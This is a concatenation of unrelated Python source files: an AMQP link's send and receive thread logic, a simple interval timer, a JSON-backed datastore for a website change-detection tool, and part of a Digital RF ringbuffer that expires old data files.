# either have waited for .1s or threshold reached, so always ack
if self.__unacked:
logger.debug('acking (%d) up to %s', self.__unacked, self.__last_id)
channel_data.basic_ack(self.__last_id, multiple=True)
self.__unacked = 0
conn.heartbeat_tick()
finally:
self.__recv_ready.clear()
try:
channel_data.basic_cancel(msgtag)
channel_ka.basic_cancel(acktag)
except:
pass
except exceptions.AccessRefused:
self.__recv_log_set_exc_and_wait('Access Refused (Credentials already in use?)')
except exceptions.ConnectionForced:
self.__recv_log_set_exc_and_wait('Disconnected by broker (ConnectionForced)')
except SocketTimeout:
self.__recv_log_set_exc_and_wait('SocketTimeout exception. wrong credentials, vhost or prefix?')
except SSLError:
self.__recv_log_set_exc_and_wait('ssl.SSLError Bad Certificate?')
except (exceptions.AMQPError, SocketError):
self.__recv_log_set_exc_and_wait('amqp/transport failure, sleeping before retry')
except:
self.__recv_log_set_exc_and_wait('unexpected failure, exiting', wait_seconds=0)
break
logger.debug('finished')
def __recv_log_set_exc_and_wait(self, msg, wait_seconds=None):
"""Equivalent to __send_log_set_exc_and_wait but for receiver thread"""
logger.log(
(
logging.ERROR if self.__recv_ready.time_since_last_clear >= self.__conn_error_log_threshold else
logging.WARNING
),
msg,
exc_info=DEBUG_ENABLED
)
self.__recv_exc = exc_info()[1]
self.__end.wait(self.__conn_retry_delay if wait_seconds is None else wait_seconds)
def __recv_exc_clear(self, log_if_exc_set=None):
"""Equivalent to __send_exc_clear"""
if not (log_if_exc_set is None or self.__recv_exc is None):
logger.info(log_if_exc_set)
self.__recv_exc = None
@profiled_thread # noqa (complexity)
def __send_run(self):
"""Send request thread
"""
while not self.__end.is_set():
try:
with Connection(userid=self.__prefix + self.__epid,
password=self.__passwd,
virtual_host=self.__vhost,
heartbeat=self.__heartbeat,
connect_timeout=self.__socket_timeout,
operation_timeout=self.__socket_timeout,
ssl=self.__get_ssl_context(self.__sslca),
host=self.__host) as conn,\
conn.channel(auto_encode_decode=False) as channel:
self.__send_channel = channel
self.__send_exc_clear(log_if_exc_set='reconnected')
self.__send_ready.set()
try:
self.__send_ready_callback(self.__send_exc_time)
while not self.__end.is_set():
with self.__send_lock:
try:
# deal with any incoming messages (AMQP protocol only, not QAPI)
conn.drain_events(0)
except (BlockingIOError, SocketTimeout):
pass
conn.heartbeat_tick()
# idle
self.__end.wait(.25)
finally:
# locked so can make sure another call to send() is not made whilst shutting down
with self.__send_lock:
self.__send_ready.clear()
except exceptions.AccessRefused:
self.__send_log_set_exc_and_wait('Access Refused (Credentials already in use?)')
except exceptions.ConnectionForced:
self.__send_log_set_exc_and_wait('Disconnected by broker (ConnectionForced)')
except SocketTimeout:
self.__send_log_set_exc_and_wait('SocketTimeout exception. wrong credentials, vhost or prefix?')
except SSLError:
self.__send_log_set_exc_and_wait('ssl.SSLError Bad Certificate?')
except (exceptions.AMQPError, SocketError):
self.__send_log_set_exc_and_wait('amqp/transport failure, sleeping before retry')
except:
self.__send_log_set_exc_and_wait('unexpected failure, exiting', wait_seconds=0)
break
logger.debug('finished')
def __send_log_set_exc_and_wait(self, msg, wait_seconds=None):
"""To be called in exception context only.
msg - message to log
wait_seconds - how long to pause for (so retry is not triggered immediately)
"""
logger.log(
(
logging.ERROR if self.__send_ready.time_since_last_clear >= self.__conn_error_log_threshold else
logging.WARNING
),
msg,
exc_info=DEBUG_ENABLED
)
self.__send_exc_time = monotonic()
self.__send_exc = exc_info()[1]
self.__end.wait(self.__conn_retry_delay if wait_seconds is None else wait_seconds)
def __send_exc_clear(self, log_if_exc_set=None):
"""Clear send exception and time. If exception was previously was set, optionally log log_if_exc_set at INFO
level.
"""
if not (log_if_exc_set is None or self.__send_exc is None):
logger.info(log_if_exc_set)
self.__send_exc_time = None
self.__send_exc = None
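# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Minimal illustration of the AmqpLink lifecycle, assuming `link` is an already-constructed
# AmqpLink instance (constructor arguments are defined earlier in this module and are not
# repeated here). The helper name `_example_amqplink_lifecycle` is hypothetical.
def _example_amqplink_lifecycle(link):
    """Start the link, send one message, then shut down cleanly."""
    link.start()  # blocks until both send and receive threads are ready, or raises LinkException
    try:
        if link.is_alive():
            # send() waits up to `timeout` seconds for the sending thread to be ready
            link.send(b'payload', content_type='application/ubjson', timeout=5)
    finally:
        link.stop()  # blocks until both worker threads have been joined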
|
SetInterval.py
|
import logging
import threading
import time
from typing import Any
class SetInterval:
def __init__(self, interval: float, action: Any) -> None:
"""コンストラクタ
Args:
interval (float): 呼び出し間隔
action (Any): 呼ぶ出す関数
"""
logging.info("init")
self.interval = interval
self.action = action
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.__set_interval)
self.thread.start()
def __set_interval(self) -> None:
"""スレッド処理"""
next_time = time.time() + self.interval
while not self.stopEvent.wait(next_time - time.time()):
next_time += self.interval
self.action()
# t.daemon = True
def cancel(self) -> None:
"""スレッドを止める"""
logging.info("cancel")
self.stopEvent.set()
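# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Minimal example: call a function once per second for a few seconds, then cancel.
# Guarded so it only runs when the module is executed directly.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)

    def tick() -> None:
        logging.info("tick at %f", time.time())

    timer = SetInterval(1.0, tick)
    time.sleep(3.5)
    timer.cancel()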
|
store.py
|
from os import unlink, path, mkdir
import json
import uuid as uuid_builder
from threading import Lock
from copy import deepcopy
import logging
import time
import threading
# Is there an existing library to ensure some data store (JSON etc) is in sync with CRUD methods?
# Open a github issue if you know something :)
# https://stackoverflow.com/questions/6190468/how-to-trigger-function-on-value-change
class ChangeDetectionStore:
lock = Lock()
def __init__(self, datastore_path="/datastore", include_default_watches=True, version_tag="0.0.0"):
self.needs_write = False
self.datastore_path = datastore_path
self.json_store_path = "{}/url-watches.json".format(self.datastore_path)
self.stop_thread = False
self.__data = {
'note': "Hello! If you change this file manually, please be sure to restart your changedetection.io instance!",
'watching': {},
'settings': {
'headers': {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',  # No support for brotli in python requests yet.
'Accept-Language': 'en-GB,en-US;q=0.9,en;'
},
'requests': {
'timeout': 15, # Default 15 seconds
'minutes_between_check': 3 * 60, # Default 3 hours
'workers': 10 # Number of threads, lower is better for slow connections
},
'application': {
'password': False,
'extract_title_as_title': False,
'fetch_backend': 'html_requests',
'notification_urls': [], # Apprise URL list
# Custom notification content
'notification_title': 'ChangeDetection.io Notification - {watch_url}',
'notification_body': '{watch_url} had a change.'
}
}
}
# Base definition for all watchers
self.generic_definition = {
'url': None,
'tag': None,
'last_checked': 0,
'last_changed': 0,
'paused': False,
'last_viewed': 0, # history key value of the last viewed via the [diff] link
'newest_history_key': "",
'title': None,
# Re #110, so then if this is set to None, we know to use the default value instead
# Requires setting to None on submit if it's the same as the default
'minutes_between_check': None,
'previous_md5': "",
'uuid': str(uuid_builder.uuid4()),
'headers': {}, # Extra headers to send
'history': {}, # Dict of timestamp and output stripped filename
'ignore_text': [], # List of text to ignore when calculating the comparison checksum
'notification_urls': [], # List of URLs to add to the notification Queue (Usually AppRise)
'css_filter': "",
'trigger_text': [], # List of text or regex to wait for until a change is detected
'fetch_backend': None,
}
if path.isfile('changedetectionio/source.txt'):
with open('changedetectionio/source.txt') as f:
# Should be set in the Dockerfile to look for /source.txt; this will give us the git commit #
# So when someone gives us a backup file to examine, we know exactly what code they were running.
self.__data['build_sha'] = f.read()
try:
# @todo retest with ", encoding='utf-8'"
with open(self.json_store_path) as json_file:
from_disk = json.load(json_file)
# @todo isn't there a way to do this dict.update recursively?
# Problem here is that if the copy on disk is missing a sub-struct, it won't be present anymore.
if 'watching' in from_disk:
self.__data['watching'].update(from_disk['watching'])
if 'app_guid' in from_disk:
self.__data['app_guid'] = from_disk['app_guid']
if 'settings' in from_disk:
if 'headers' in from_disk['settings']:
self.__data['settings']['headers'].update(from_disk['settings']['headers'])
if 'requests' in from_disk['settings']:
self.__data['settings']['requests'].update(from_disk['settings']['requests'])
if 'application' in from_disk['settings']:
self.__data['settings']['application'].update(from_disk['settings']['application'])
# Reinitialise each `watching` with our generic_definition in the case that we add a new var in the future.
# @todo pretty sure there's a Pythonic way to do this with an abstracted(?) object!
for uuid, watch in self.__data['watching'].items():
_blank = deepcopy(self.generic_definition)
_blank.update(watch)
self.__data['watching'].update({uuid: _blank})
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
print("Watching:", uuid, self.__data['watching'][uuid]['url'])
# First run, file doesn't exist yet.
except (FileNotFoundError, json.decoder.JSONDecodeError):
if include_default_watches:
print("Creating JSON store at", self.datastore_path)
self.add_watch(url='http://www.quotationspage.com/random.php', tag='test')
self.add_watch(url='https://news.ycombinator.com/', tag='Tech news')
self.add_watch(url='https://www.gov.uk/coronavirus', tag='Covid')
self.add_watch(url='https://changedetection.io', tag='Tech news')
self.__data['version_tag'] = version_tag
# Helper to remove password protection
password_reset_lockfile = "{}/removepassword.lock".format(self.datastore_path)
if path.isfile(password_reset_lockfile):
self.__data['settings']['application']['password'] = False
unlink(password_reset_lockfile)
if 'app_guid' not in self.__data:
import sys
import os
if "pytest" in sys.modules or "PYTEST_CURRENT_TEST" in os.environ:
self.__data['app_guid'] = "test-" + str(uuid_builder.uuid4())
else:
self.__data['app_guid'] = str(uuid_builder.uuid4())
self.needs_write = True
# Finally start the thread that will manage periodic data saves to JSON
save_data_thread = threading.Thread(target=self.save_datastore)
save_data_thread.start()
# Returns the newest key, but if there's only 1 record then it's counted as not being new, so return 0.
def get_newest_history_key(self, uuid):
if len(self.__data['watching'][uuid]['history']) == 1:
return 0
dates = list(self.__data['watching'][uuid]['history'].keys())
# Convert to int, sort and back to str again
dates = [int(i) for i in dates]
dates.sort(reverse=True)
if len(dates):
# always keyed as str
return str(dates[0])
return 0
def set_last_viewed(self, uuid, timestamp):
self.data['watching'][uuid].update({'last_viewed': int(timestamp)})
self.needs_write = True
def update_watch(self, uuid, update_obj):
# Skip if 'paused' state
if self.__data['watching'][uuid]['paused']:
return
with self.lock:
# In python 3.9 we have the |= dict operator, but that still will lose data on nested structures...
for dict_key, d in self.generic_definition.items():
if isinstance(d, dict):
if update_obj is not None and dict_key in update_obj:
self.__data['watching'][uuid][dict_key].update(update_obj[dict_key])
del (update_obj[dict_key])
self.__data['watching'][uuid].update(update_obj)
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
self.needs_write = True
@property
def data(self):
has_unviewed = False
for uuid, v in self.__data['watching'].items():
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
if int(v['newest_history_key']) <= int(v['last_viewed']):
self.__data['watching'][uuid]['viewed'] = True
else:
self.__data['watching'][uuid]['viewed'] = False
has_unviewed = True
# #106 - Be sure this is None on empty string, False, None, etc
if not self.__data['watching'][uuid]['title']:
self.__data['watching'][uuid]['title'] = None
# Default var for fetch_backend
if not self.__data['watching'][uuid]['fetch_backend']:
self.__data['watching'][uuid]['fetch_backend'] = self.__data['settings']['application']['fetch_backend']
self.__data['has_unviewed'] = has_unviewed
return self.__data
def get_all_tags(self):
tags = []
for uuid, watch in self.data['watching'].items():
# Support for comma separated list of tags.
for tag in watch['tag'].split(','):
tag = tag.strip()
if tag not in tags:
tags.append(tag)
tags.sort()
return tags
def unlink_history_file(self, path):
try:
unlink(path)
except (FileNotFoundError, IOError):
pass
# Delete a single watch by UUID
def delete(self, uuid):
with self.lock:
if uuid == 'all':
self.__data['watching'] = {}
# GitHub #30 also delete history records
for uuid in self.data['watching']:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
else:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
del self.data['watching'][uuid]
self.needs_write = True
def url_exists(self, url):
# Probably there should be a dict...
for watch in self.data['watching'].values():
if watch['url'] == url:
return True
return False
def get_val(self, uuid, val):
# Probably there should be a dict...
return self.data['watching'][uuid].get(val)
# Remove a watch's data but keep the entry (URL etc)
def scrub_watch(self, uuid, limit_timestamp = False):
import hashlib
del_timestamps = []
changes_removed = 0
for timestamp, path in self.data['watching'][uuid]['history'].items():
if not limit_timestamp or (limit_timestamp is not False and int(timestamp) > limit_timestamp):
self.unlink_history_file(path)
del_timestamps.append(timestamp)
changes_removed += 1
if not limit_timestamp:
self.data['watching'][uuid]['last_checked'] = 0
self.data['watching'][uuid]['last_changed'] = 0
self.data['watching'][uuid]['previous_md5'] = 0
for timestamp in del_timestamps:
del self.data['watching'][uuid]['history'][str(timestamp)]
# If there was a limit_timestamp, we need to reset some metadata about the entry
# This has to happen after we remove the others from the list
if limit_timestamp:
newest_key = self.get_newest_history_key(uuid)
if newest_key:
self.data['watching'][uuid]['last_checked'] = int(newest_key)
# @todo should be the original value if it was less than newest key
self.data['watching'][uuid]['last_changed'] = int(newest_key)
try:
with open(self.data['watching'][uuid]['history'][str(newest_key)], "rb") as fp:
content = fp.read()
self.data['watching'][uuid]['previous_md5'] = hashlib.md5(content).hexdigest()
except (FileNotFoundError, IOError):
self.data['watching'][uuid]['previous_md5'] = False
self.needs_write = True
return changes_removed
def add_watch(self, url, tag):
with self.lock:
# @todo use a common generic version of this
new_uuid = str(uuid_builder.uuid4())
_blank = deepcopy(self.generic_definition)
_blank.update({
'url': url,
'tag': tag,
'uuid': new_uuid
})
self.data['watching'][new_uuid] = _blank
# Get the directory ready
output_path = "{}/{}".format(self.datastore_path, new_uuid)
try:
mkdir(output_path)
except FileExistsError:
print(output_path, "already exists.")
self.sync_to_json()
return new_uuid
# Save some text file to the appropriate path and bump the history
# result_obj from fetch_site_status.run()
def save_history_text(self, watch_uuid, contents):
import uuid
output_path = "{}/{}".format(self.datastore_path, watch_uuid)
fname = "{}/{}.stripped.txt".format(output_path, uuid.uuid4())
with open(fname, 'wb') as f:
f.write(contents)
return fname
def sync_to_json(self):
print("Saving..")
data = {}
try:
data = deepcopy(self.__data)
except RuntimeError:
time.sleep(0.5)
print("! Data changed when writing to JSON, trying again..")
self.sync_to_json()
return
else:
with open(self.json_store_path, 'w') as json_file:
json.dump(data, json_file, indent=4)
logging.info("Re-saved index")
self.needs_write = False
# Thread runner: this helps with thread/write issues when there are many operations that want to update the
# JSON, by just running periodically in one thread. According to Python, dict updates are thread-safe.
def save_datastore(self):
while True:
if self.stop_thread:
print("Shutting down datastore thread")
return
if self.needs_write:
self.sync_to_json()
time.sleep(3)
# Go through the datastore path and remove any snapshots that are not mentioned in the index
# This usually is not used, but can be handy.
def remove_unused_snapshots(self):
print("Removing snapshots from datastore that are not in the index..")
index = []
for uuid in self.data['watching']:
for id in self.data['watching'][uuid]['history']:
index.append(self.data['watching'][uuid]['history'][str(id)])
import pathlib
# Only in the sub-directories
for item in pathlib.Path(self.datastore_path).rglob("*/*txt"):
if str(item) not in index:
    print("Removing", item)
unlink(item)
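# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Minimal illustration of the ChangeDetectionStore CRUD surface. The datastore path below is
# an example only; `_example_store_usage` is a hypothetical helper and is never called here.
def _example_store_usage(datastore_path="/tmp/changedetection-example"):
    import os
    os.makedirs(datastore_path, exist_ok=True)
    store = ChangeDetectionStore(datastore_path=datastore_path, include_default_watches=False)
    new_uuid = store.add_watch(url="https://example.com/", tag="examples")
    store.update_watch(new_uuid, {"title": "Example watch"})
    print("tags:", store.get_all_tags())
    # tell the background save thread to exit before discarding the store
    store.stop_thread = True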
|
ringbuffer.py
|
# ----------------------------------------------------------------------------
# Copyright (c) 2017 Massachusetts Institute of Technology (MIT)
# All rights reserved.
#
# Distributed under the terms of the BSD 3-clause license.
#
# The full license is in the LICENSE file, distributed with this software.
# ----------------------------------------------------------------------------
"""Module for watching a directory and deleting the oldest Digital RF files."""
from __future__ import absolute_import, division, print_function
import datetime
import errno
import os
import re
import sys
import threading
import time
import traceback
from collections import OrderedDict, defaultdict, deque, namedtuple
from . import list_drf, util, watchdog_drf
__all__ = ("DigitalRFRingbufferHandler", "DigitalRFRingbuffer")
class DigitalRFRingbufferHandlerBase(watchdog_drf.DigitalRFEventHandler):
"""Base event handler for implementing a ringbuffer of Digital RF files.
This handler tracks files but does nothing to expire them. At least one
expirer mixin must be used with this class in order to create a complete
ringbuffer.
"""
FileRecord = namedtuple("FileRecord", ("key", "size", "path", "group"))
def __init__(
self,
verbose=False,
dryrun=False,
starttime=None,
endtime=None,
include_drf=True,
include_dmd=True,
):
"""Create a ringbuffer handler.
Other Parameters
----------------
starttime : datetime.datetime
Data covering this time or after will be included. This has no
effect on property files.
endtime : datetime.datetime
Data covering this time or earlier will be included. This has no
effect on property files.
include_drf : bool
If True, include Digital RF files.
include_dmd : bool
If True, include Digital Metadata files.
"""
self.verbose = verbose
self.dryrun = dryrun
# separately track file groups (ch path, name) with different queues
self.queues = defaultdict(deque)
self.records = {}
# acquire the record lock to modify the queue or record dicts
self._record_lock = threading.RLock()
super(DigitalRFRingbufferHandlerBase, self).__init__(
starttime=starttime,
endtime=endtime,
include_drf=include_drf,
include_dmd=include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
def status(self):
"""Return status string about state of the ringbuffer."""
nfiles = sum(len(q) for q in self.queues.values())
return "{0} files".format(nfiles)
def _get_file_record(self, path):
"""Return self.FileRecord tuple for file at path."""
# get time key (seconds) from file path
key = None
for r in self.regexes:
m = r.match(path)
try:
secs = int(m.group("secs"))
except (AttributeError, IndexError, TypeError):
# no match, or regex matched but there is no 'secs' in regex
continue
else:
try:
frac = int(m.group("frac"))
except (IndexError, TypeError):
frac = 0
# key is time in milliseconds
key = secs * 1000 + frac
break
if key is None:
return
# ringbuffer by file groups, which are a channel path and name
group = (m.group("chpath"), m.group("name"))
try:
stat = os.stat(path)
except OSError:
if self.verbose:
traceback.print_exc()
return
else:
size = stat.st_size
return self.FileRecord(key=key, size=size, path=path, group=group)
def _add_to_queue(self, rec):
"""Add record to queue."""
# find insertion index for record (queue sorted in ascending order)
# we expect new records to go near the end (most recent)
queue = self.queues[rec.group]
with self._record_lock:
for k, (kkey, kpath) in enumerate(reversed(queue)):
if rec.key > kkey:
# we've found the insertion point at index k from end
break
elif rec.path == kpath:
# already in ringbuffer, so simply return
return
else:
# new key is oldest (or queue is empty),
# needs to be put at beginning
queue.appendleft((rec.key, rec.path))
k = None
if k is not None:
# insert record at index k
queue.rotate(k)
queue.append((rec.key, rec.path))
queue.rotate(-k)
def _remove_from_queue(self, rec):
"""Remove record from queue."""
queue = self.queues[rec.group]
with self._record_lock:
queue.remove((rec.key, rec.path))
def _expire_oldest_from_group(self, group):
"""Expire oldest record from group and delete corresponding file."""
# oldest file is at start of sorted records deque
# (don't just popleft on the queue because we want to call
# _remove_from_queue, which is overridden by subclasses)
with self._record_lock:
key, path = self.queues[group][0]
rec = self.records.pop(path)
self._remove_from_queue(rec)
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Expired {1}".format(now, rec.path))
# delete file
if not self.dryrun:
try:
os.remove(rec.path)
except EnvironmentError as e:
# Python 2 and 3 compatible substitute for FileNotFoundError
if e.errno == errno.ENOENT:
# path doesn't exist like we thought it did, oh well
if self.verbose:
traceback.print_exc()
else:
# try again if path still exists, otherwise it's ok to move on
if os.path.exists(rec.path):
os.remove(rec.path)
# try to clean up directory in case it is empty
head, tail = os.path.split(rec.path)
try:
os.rmdir(head)
except OSError:
# directory not empty, just move on
pass
def _expire(self, group):
"""Expire records until ringbuffer constraint is met."""
# must override with mixins for any expiration to occur
pass
def _add_record(self, rec):
"""Add a record to the ringbuffer and expire old ones if necesssary."""
with self._record_lock:
# make sure record does not already exist, remove if it does
if rec.path in self.records:
if self.verbose:
msg = (
"Adding record for {0} but it already exists in"
" ringbuffer, modify instead."
).format(rec.path)
print(msg)
self._modify_record(rec)
# add record to dict so record information can be looked up by path
self.records[rec.path] = rec
# add record to expiration queue
self._add_to_queue(rec)
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Added {1}".format(now, rec.path))
# expire oldest files until size constraint is met
self._expire(rec.group)
def _modify_record(self, rec):
"""Modify a record in the ringbuffer, return whether it was done."""
with self._record_lock:
if rec.path not in self.records:
# don't have record in ringbuffer when we should, add instead
if self.verbose:
msg = (
"Missing modified file {0} from ringbuffer, adding" " instead."
).format(rec.path)
print(msg)
self._add_record(rec)
return True
# nothing to do otherwise
return False
def _remove_record(self, path):
"""Remove a record from the ringbuffer."""
# get and remove record id if path is in the ringbuffer, return if not
with self._record_lock:
try:
rec = self.records.pop(path)
except KeyError:
# we probably got here from a FileDeletedEvent after expiring
# an old record, but in any case, no harm to just ignore
return
# remove record from ringbuffer
self._remove_from_queue(rec)
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Removed {1}".format(now, rec.path))
def add_files(self, paths, sort=True):
"""Create file records from paths and add to ringbuffer."""
# get records and add from oldest to newest by key (time)
records = (self._get_file_record(p) for p in paths)
# filter out invalid paths (can't extract a time, doesn't exist)
records = (r for r in records if r is not None)
if sort:
records = sorted(records)
for rec in records:
self._add_record(rec)
def modify_files(self, paths, sort=True):
"""Create file records from paths and update in ringbuffer."""
# get records and add from oldest to newest by key (time)
records = (self._get_file_record(p) for p in paths)
# filter out invalid paths (can't extract a time, doesn't exist)
records = (r for r in records if r is not None)
if sort:
records = sorted(records)
for rec in records:
self._modify_record(rec)
def remove_files(self, paths):
"""Retrieve file records from paths and remove from ringbuffer."""
for p in paths:
self._remove_record(p)
def on_created(self, event):
"""Add new file to ringbuffer."""
self.add_files([event.src_path])
def on_deleted(self, event):
"""Remove file from ringbuffer if it was deleted externally."""
self.remove_files([event.src_path])
def on_modified(self, event):
"""Update modified file in ringbuffer."""
self.modify_files([event.src_path])
def on_moved(self, event):
"""Track moved file in ringbuffer."""
self.remove_files([event.src_path])
self.add_files([event.dest_path])
class CountExpirer(object):
"""Ringbuffer handler mixin to track the number of files in each channel.
When the count threshold of a channel is exceeded, the oldest files in that
channel are deleted until the count constraint is met.
"""
def __init__(self, *args, **kwargs):
"""Create a ringbuffer handler."""
self.count = kwargs.pop("count")
super(CountExpirer, self).__init__(*args, **kwargs)
def status(self):
"""Return status string about state of the ringbuffer."""
status = super(CountExpirer, self).status()
try:
max_count = max(len(q) for q in self.queues.values())
except ValueError:
max_count = 0
pct_full = int(float(max_count) / self.count * 100)
return ", ".join((status, "{0}% count".format(pct_full)))
def _expire(self, group):
"""Expire records until file count constraint is met."""
with self._record_lock:
queue = self.queues[group]
while len(queue) > self.count:
self._expire_oldest_from_group(group)
super(CountExpirer, self)._expire(group)
class SizeExpirer(object):
"""Ringbuffer handler mixin to track the space used by all channels.
This expirer tracks the amount of space that new or modified files consume
for all channels together. When the space threshold is exceeded, the oldest
file of any channel is deleted (unless it would empty the channel) until
the size constraint is met.
"""
def __init__(self, *args, **kwargs):
"""Create a ringbuffer handler."""
self.size = kwargs.pop("size")
self.active_size = 0
super(SizeExpirer, self).__init__(*args, **kwargs)
def status(self):
"""Return status string about state of the ringbuffer."""
status = super(SizeExpirer, self).status()
pct_full = int(float(self.active_size) / self.size * 100)
return ", ".join((status, "{0}% size".format(pct_full)))
def _add_to_queue(self, rec):
"""Add record to queue, tracking file size."""
with self._record_lock:
super(SizeExpirer, self)._add_to_queue(rec)
self.active_size += rec.size
def _remove_from_queue(self, rec):
"""Remove record from queue, tracking file size."""
with self._record_lock:
super(SizeExpirer, self)._remove_from_queue(rec)
self.active_size -= rec.size
def _expire_oldest(self, group):
"""Expire oldest record overall, preferring group if tied."""
with self._record_lock:
# remove oldest regardless of group unless it would empty group,
# but prefer `group` if tie
removal_group = group
# oldest file is at start of sorted records deque
try:
oldest_key, oldest_path = self.queues[group][0]
except IndexError:
oldest_key = float("inf")
for grp in self.queues.keys():
if grp != group:
queue = self.queues[grp]
if len(queue) > 1:
key, path = queue[0]
if key < oldest_key:
oldest_key = key
removal_group = grp
self._expire_oldest_from_group(removal_group)
def _expire(self, group):
"""Expire records until overall file size constraint is met."""
with self._record_lock:
while self.active_size > self.size:
self._expire_oldest(group)
super(SizeExpirer, self)._expire(group)
def _modify_record(self, rec):
"""Modify a record in the ringbuffer."""
with self._record_lock:
# have parent handle cases where we actually need to add or delete
handled = super(SizeExpirer, self)._modify_record(rec)
if not handled:
# if we're here, we know that the record exists and needs to
# be modified (in this case, update the size)
oldrec = self.records[rec.path]
self.records[rec.path] = rec
self.active_size -= oldrec.size
self.active_size += rec.size
if self.verbose:
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Updated {1}".format(now, rec.path))
class TimeExpirer(object):
"""Ringbuffer handler mixin to track the time span of each channel.
This handler tracks the sample timestamp of files in each channel. When the
duration threshold of a channel is exceeded (newest timestamp minus
oldest), the oldest files in the channel are deleted until the duration
constraint is met.
"""
def __init__(self, *args, **kwargs):
"""Create a ringbuffer handler."""
# duration is time span in milliseconds
self.duration = kwargs.pop("duration")
super(TimeExpirer, self).__init__(*args, **kwargs)
@staticmethod
def _queue_duration(queue):
"""Get time span in milliseconds of files in a queue."""
try:
oldkey, _ = queue[0]
newkey, _ = queue[-1]
except IndexError:
return 0
return newkey - oldkey
def status(self):
"""Return status string about state of the ringbuffer."""
status = super(TimeExpirer, self).status()
try:
max_duration = max(self._queue_duration(q) for q in self.queues.values())
except ValueError:
max_duration = 0
pct_full = int(float(max_duration) / self.duration * 100)
return ", ".join((status, "{0}% duration".format(pct_full)))
def _expire(self, group):
"""Expire records until time span constraint is met."""
with self._record_lock:
queue = self.queues[group]
while self._queue_duration(queue) > self.duration:
self._expire_oldest_from_group(group)
super(TimeExpirer, self)._expire(group)
def DigitalRFRingbufferHandler(size=None, count=None, duration=None, **kwargs):
"""Create ringbuffer handler given constraints.
Parameters
----------
size : float | int | None
Size of the ringbuffer in bytes. Negative values are used to
indicate all available space except the given amount. If None, no
size constraint is used.
count : int | None
Maximum number of files *for each channel*. If None, no count
constraint is used.
duration : int | float | None
Maximum time span *for each channel* in milliseconds. If None, no
duration constraint is used.
Other Parameters
----------------
verbose : bool
If True, print debugging info about the files that are created and
deleted and how much space they consume.
dryrun : bool
If True, do not actually delete files when expiring them from the
ringbuffer. Use for testing only!
starttime : datetime.datetime
Data covering this time or after will be included. This has no
effect on property files.
endtime : datetime.datetime
Data covering this time or earlier will be included. This has no
effect on property files.
include_drf : bool
If True, include Digital RF files. If False, ignore Digital RF
files.
include_dmd : bool
If True, include Digital Metadata files. If False, ignore Digital
Metadata files.
"""
if size is None and count is None and duration is None:
errstr = "One of `size`, `count`, or `duration` must not be None."
raise ValueError(errstr)
bases = (DigitalRFRingbufferHandlerBase,)
# add mixins in this particular order for expected results
if size is not None:
bases = (SizeExpirer,) + bases
kwargs["size"] = size
if duration is not None:
bases = (TimeExpirer,) + bases
kwargs["duration"] = duration
if count is not None:
bases = (CountExpirer,) + bases
kwargs["count"] = count
# now create the class with the desired mixins
docstring = """Event handler for implementing a ringbuffer of Digital RF files.
This class inherits from a base class (DigitalRFRingbufferHandlerBase)
and some expirer mixins determined from the class factory arguments.
The expirers determine when a file needs to be expired from the
ringbuffer based on size, count, or duration constraints.
"""
cls = type("DigitalRFRingbufferHandler", bases, {"__doc__": docstring})
return cls(**kwargs)
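# --- Hedged illustration (editor's addition, not part of the original module) ---
# The factory above builds the handler class from the expirer mixins at call time. The helper
# below (hypothetical, never called by this module) composes a size + count ringbuffer; the
# resulting class bases are (CountExpirer, SizeExpirer, DigitalRFRingbufferHandlerBase), so
# both constraints are enforced whenever a file record is added.
def _example_build_size_count_handler():
    handler = DigitalRFRingbufferHandler(size=10e9, count=1000, verbose=True)
    return handler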
class DigitalRFRingbuffer(object):
"""Monitor a directory and delete old Digital RF files when space is full.
This class combines an event handler and a file system observer. It
monitors a directory and its subdirectories for new Digital RF and Digital
Metadata files. When the ringbuffer threshold in size, count, or duration
is exceeded, the oldest files are deleted until the constraint is met.
"""
def __init__(
self,
path,
size=-200e6,
count=None,
duration=None,
verbose=False,
status_interval=10,
dryrun=False,
starttime=None,
endtime=None,
include_drf=True,
include_dmd=True,
force_polling=False,
):
"""Create Digital RF ringbuffer object. Use start/run method to begin.
Parameters
----------
path : str
Directory in which the ringbuffer is enforced.
size : float | int | None
Size of the ringbuffer in bytes. Negative values are used to
indicate all available space except the given amount. If None, no
size constraint is used.
count : int | None
Maximum number of files *for each channel*. If None, no count
constraint is used.
duration : int | float | None
Maximum time span *for each channel* in milliseconds. If None, no
duration constraint is used.
Other Parameters
----------------
verbose : bool
If True, print debugging info about the files that are created and
deleted and how much space they consume.
status_interval : None | int
Interval in seconds between printing of status updates. If None,
do not print status updates.
dryrun : bool
If True, do not actually delete files when expiring them from the
ringbuffer. Use for testing only!
starttime : datetime.datetime
Data covering this time or after will be included. This has no
effect on property files.
endtime : datetime.datetime
Data covering this time or earlier will be included. This has no
effect on property files.
include_drf : bool
If True, include Digital RF files. If False, ignore Digital RF
files.
include_dmd : bool
If True, include Digital Metadata files. If False, ignore Digital
Metadata files.
force_polling : bool
If True, force the watchdog to use polling instead of the default
observer.
"""
self.path = os.path.abspath(path)
self.size = size
self.count = count
self.duration = duration
self.verbose = verbose
self.status_interval = status_interval
self.dryrun = dryrun
self.starttime = starttime
self.endtime = endtime
self.include_drf = include_drf
self.include_dmd = include_dmd
self.force_polling = force_polling
self._start_time = None
self._task_threads = []
if self.size is None and self.count is None and self.duration is None:
errstr = "One of `size`, `count`, or `duration` must not be None."
raise ValueError(errstr)
if not self.include_drf and not self.include_dmd:
